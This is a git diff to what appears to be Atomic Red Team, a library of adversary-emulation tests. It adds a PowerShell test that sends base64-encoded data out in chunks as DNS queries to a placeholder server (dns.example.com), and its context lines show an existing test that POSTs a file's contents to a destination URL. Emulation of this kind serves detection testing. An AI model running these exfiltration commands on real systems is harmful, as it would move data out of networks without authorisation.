redcanaryco · clr2of8 · Jan 29, 2024 · Jan 19, 2024 · Jan 20, 2024 · Jan 21, 2024
diff --git a/atomics/T1041/T1041.yaml b/atomics/T1041/T1041.yaml
@@ -25,3 +25,44 @@ atomic_tests:
       $filecontent = Get-Content -Path #{filepath}
       Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
     name: powershell
+
+- name: DNS-Based C2 Data Exfiltration
+  auto_generated_guid: c9207f3e-213d-4cc7-ad2a-7697a7237df9
+  description: |
+    Simulates an adversary using DNS tunneling to exfiltrate data over a Command and Control (C2) channel.
+  supported_platforms:
+  - windows
+  input_arguments:
+    dns_server:
+      description: DNS server IP address or domain name.
+      type: string
+      default: dns.example.com
+    exfiltrated_data:
+      description: Data to be exfiltrated.
+      type: string
+      default: SecretDataToExfiltrate
+    chunk_size:
+      description: Size of each DNS query chunk (in characters).
+      type: integer
+      default: 63
+  executor:
+    command: |
+      $dnsServer = "#{dns_server}"
+      $exfiltratedData = "#{exfiltrated_data}"
+      $chunkSize = #{chunk_size}
+
+      $encodedData = [System.Text.Encoding]::UTF8.GetBytes($exfiltratedData)
+      $encodedData = [Convert]::ToBase64String($encodedData)
+      $chunks = $encodedData -split "(.{$chunkSize})"
+
+      foreach ($chunk in $chunks) {
+          $dnsQuery = $chunk + "." + $dnsServer
+          Resolve-DnsName -Name $dnsQuery
+          Start-Sleep -Seconds 5
+      }
+    name: powershell
+  cleanup:
+    - description: Remove DNS-related artifacts and clear DNS cache.
+      command: |
+        # Cleanup actions to remove DNS-related artifacts or clear DNS cache, if necessary.
+        # For example, you can remove any DNS query logs or artifacts generated during the test.